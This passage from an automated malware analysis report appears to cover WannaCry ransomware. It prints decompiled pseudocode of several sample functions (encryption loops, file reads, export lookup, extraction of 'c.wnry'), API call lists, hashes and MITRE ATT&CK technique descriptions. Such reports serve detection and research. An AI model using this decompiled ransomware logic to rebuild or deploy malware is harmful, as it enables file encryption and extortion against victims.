						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}

0x00403a7f
0x00403a87
0x00403a91
0x00403a9a
0x00403a9f
0x00403aa0
0x00403aa0
0x00403aa5
0x00403aaa
0x00403bba
0x00403bc2
0x00403bcb
0x00403bd0
0x00403bd1
0x00403bd9
0x00403bda
0x00403bdb
0x00403bdc
0x00403be0
0x00403be3
0x00403be6
0x00403be9
0x00403bee
0x00403bf1
0x00403bf4
0x00403bf6
0x00403bf6
0x00403bf9
0x00403bf9
0x00403bfc
0x00403c00
0x00403c02
0x00403c02
0x00403c06
0x00403c0e
0x00403c0e
0x00403c12
0x00403c17
0x00403c1a
0x00403c1f
0x00403c26
0x00403c28
0x00403c2b
0x00403c2e
0x00403c2e
0x00403c33
0x00403c3c
0x00403c41
0x00403c44
0x00403c47
0x00403c47
0x00403c4a
0x00403c50
0x00403c52
0x00403c58
0x00403c5b
0x00403c5d
0x00403c5d
0x00403c63
0x00403c63
0x00403c66
0x00403c6a
0x00403c6c
0x00403c6c
0x00403c70
0x00403c78
0x00403c78
0x00403c7c
0x00403c81
0x00403c84
0x00403c89
0x00403c90
0x00403c92
0x00403c95
0x00403c98
0x00403c98
0x00403c9d
0x00403ca6
0x00403cab
0x00403cb1
0x00403cb1
0x00403c9d
0x00403cb7
0x00403cbd
0x00403cc7
0x00403ab0
0x00403ab0
0x00403abc
0x00000000
0x00403ac2
0x00403ac6
0x00403b2c
0x00403b2f
0x00403b32
0x00403b35
0x00403b38
0x00403b8d
0x00403b91
0x00403b93
0x00403b97
0x00403b9c
0x00403ba7
0x00403ba9
0x00403bab
0x00403bad
0x00403bb0
0x00000000
0x00403b93
0x00403b3a
0x00403b3c
0x00403b40
0x00403b42
0x00403b4c
0x00403b55
0x00403b68
0x00403b6d
0x00403b78
0x00403b7b
0x00403b7d
0x00403b7f
0x00403b81
0x00403b84
0x00000000
0x00403b42
0x00403b40
0x00403ac8
0x00403acb
0x00403ace
0x00403ad0
0x00403ad3
0x00403ad8
0x00403ada
0x00403ade
0x00403aed
0x00403b00
0x00403b05
0x00403b10
0x00403b13
0x00403b15
0x00403b17
0x00403b19
0x00403b1c
0x00403ada
0x00403ad8
0x00403b25
0x00403b25
0x00403abc

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID:
API String ID: 2382887404-0
Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
fclose.MSVCRT(00000000), ref: 00401058

Strings

c.wnry, xrefs: 00401016

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: fclosefopenfreadfwrite
String ID: c.wnry
API String ID: 4000964834-3240288721
Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE

Uniqueness

Uniqueness Score: -1.00%

Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}

0x004018fc
0x004018fe
0x00401903
0x0040190e
0x0040190f
0x0040191c
0x00401922
0x00401925
0x00401928
0x0040193a
0x00401940
0x00401946
0x00401950
0x00401952
0x00401958
0x0040196a
0x0040196c
0x00401971
0x00401987
0x0040198a
0x0040198b
0x0040198c
0x0040198f
0x00401990
0x0040199b
0x0040199d
0x0040199f
0x0040199f
0x0040199b
0x00401971
0x00401958
0x004019a0
0x004019a5
0x004019a6
0x004019d5
0x004019e0

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
_local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AllocCreateGlobalReadSize_local_unwind2
String ID:
API String ID: 2811923685-0
Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC

Uniqueness

Uniqueness Score: -1.00%

Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}

0x00405bb2
0x00405bbb
0x00405bd2
0x00405bd7
0x00405bdc
0x00405bdf
0x00405be1
0x00405be4
0x00405c18
0x00405c1b
0x00405c24
0x00405c29
0x00405c32
0x00405c36
0x00405c36
0x00405c38
0x00405c42
0x00405c44
0x00405c6c
0x00405c6f
0x00405c72
0x00405c77
0x00405c7a
0x00405c7d
0x00405c80
0x00405c83
0x00405c90
0x00405c90
0x00405c4c
0x00405c4f
0x00405c51
0x00405c57
0x00405c5b
0x00405c5e
0x00405c61
0x00405c64
0x00405c64
0x00405c96
0x00405c98
0x00000000
0x00405c98
0x00405be9
0x00000000
0x00000000
0x00405c04
0x00405c09
0x00405c20
0x00000000
0x00405c20
0x00405c0b
0x00000000
0x00405bc7
0x00405bca
0x00405c11
0x00405c11
0x00405c9a
0x00405c9e
0x00405c9e

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$Pointer$??2@Create
String ID:
API String ID: 1331958074-0
Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402924(intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;
				signed int _t37;
				signed short* _t41;
				intOrPtr _t44;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				void* _t59;

				_t26 = _a4;
				_t44 =  *((intOrPtr*)(_t26 + 4));
				_t28 =  *_t26 + 0x78;
				_v8 = _t44;
				if( *((intOrPtr*)(_t28 + 4)) == 0) {
					L11:
					SetLastError(0x7f);
					_t29 = 0;
				} else {
					_t58 =  *_t28;
					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
					_t59 = _t58 + _t44;
					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
						goto L11;
					} else {
						_t8 =  &_a8; // 0x402150
						if( *_t8 >> 0x10 != 0) {
							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
							_a4 = 0;
							if(_t30 <= 0) {
								goto L11;
							} else {
								while(1) {
									_t32 =  *_t55 + _t44;
									_t15 =  &_a8; // 0x402150
									__imp___stricmp( *_t15, _t32);
									if(_t32 == 0) {
										break;
									}
									_a4 = _a4 + 1;
									_t55 = _t55 + 4;
									_t41 =  &(_t41[1]);
									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
										_t44 = _v8;
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								_t33 =  *_t41 & 0x0000ffff;
								_t44 = _v8;
								goto L14;
							}
						} else {
							_t9 =  &_a8; // 0x402150
							_t37 =  *_t9 & 0x0000ffff;
							_t49 =  *((intOrPtr*)(_t59 + 0x10));
							if(_t37 < _t49) {
								goto L11;
							} else {
								_t33 = _t37 - _t49;
								L14:
								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
									goto L11;
								} else {
									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
								}
							}
						}
					}
				}
				L12:
				return _t29;
			}

0x00402928
0x0040292f
0x00402934
0x00402938
0x0040293e
0x004029a5
0x004029a7
0x004029ad
0x00402940
0x00402940
0x00402942
0x00402946
0x0040294a
0x00000000
0x00402951
0x00402951
0x0040295a
0x00402971
0x00402973
0x00402977
0x0040297a
0x00000000
0x0040297c
0x00402981
0x00402983
0x00402986
0x00402989
0x00402993
0x00000000
0x00000000
0x00402995
0x00402998
0x0040299f
0x004029a3
0x0040297e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004029a3
0x004029b4
0x004029b7
0x00000000
0x004029b7
0x0040295c
0x0040295c
0x0040295c
0x00402960
0x00402965
0x00000000
0x00402967
0x00402967
0x004029ba
0x004029bd
0x00000000
0x004029bf
0x004029c8
0x004029c8
0x004029bd
0x00402965
0x0040295a
0x0040294a
0x004029af
0x004029b3

APIs

_stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7

Strings

P!@, xrefs: 00402951, 00402986, 0040295C

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ErrorLast_stricmp
String ID: P!@
API String ID: 1278613211-1774101457
Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}

0x00401dfe
0x00401e00
0x00401e05
0x00401e0e
0x00401e1a
0x00401e21
0x00401e2d
0x00401e32
0x00401e38
0x00401e3b
0x00401e3f
0x00401e41
0x00401e4a
0x00401e5b
0x00401e60
0x00401e65
0x00401e82
0x00401e87
0x00401e87
0x00401e8a
0x00401e8b
0x00401e41
0x00401e90
0x00401e96
0x00401e98
0x00401e07
0x00401e07
0x00401e9d

APIs

strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
GetFileAttributesA.KERNEL32(?), ref: 00401E6E

Strings

c.wnry, xrefs: 00401E55

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AttributesFilestrcmp
String ID: c.wnry
API String ID: 3324900478-3240288721
Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA

Uniqueness

Uniqueness Score: -1.00%

Function 00405C9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));
					}
					_push(_t9);
					L004076E8();
					return 0;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x00405ca0
0x00405ca6
0x00405cb1
0x00405cb6
0x00405cb6
0x00405cbc
0x00405cbd
0x00405cc6
0x00405ca8
0x00405cac
0x00405cac

APIs

CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD

Strings

$l@, xrefs: 00405C9F

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??3@CloseHandle
String ID: $l@
API String ID: 3816424416-2140230165
Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC

Uniqueness

Uniqueness Score: -1.00%

Function 004019E1 Relevance: 5.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}

0x004019e5
0x004019ec
0x00401a19
0x00000000
0x00401a19
0x004019ee
0x004019f2
0x00401a08
0x00401a10
0x00401a11
0x00401a1d
0x00401a2c
0x00401a3a
0x00401a3e
0x00000000
0x00401a3e
0x00401a13
0x00000000

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CriticalSection$Leave$Entermemcpy
String ID:
API String ID: 3435569088-0
Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

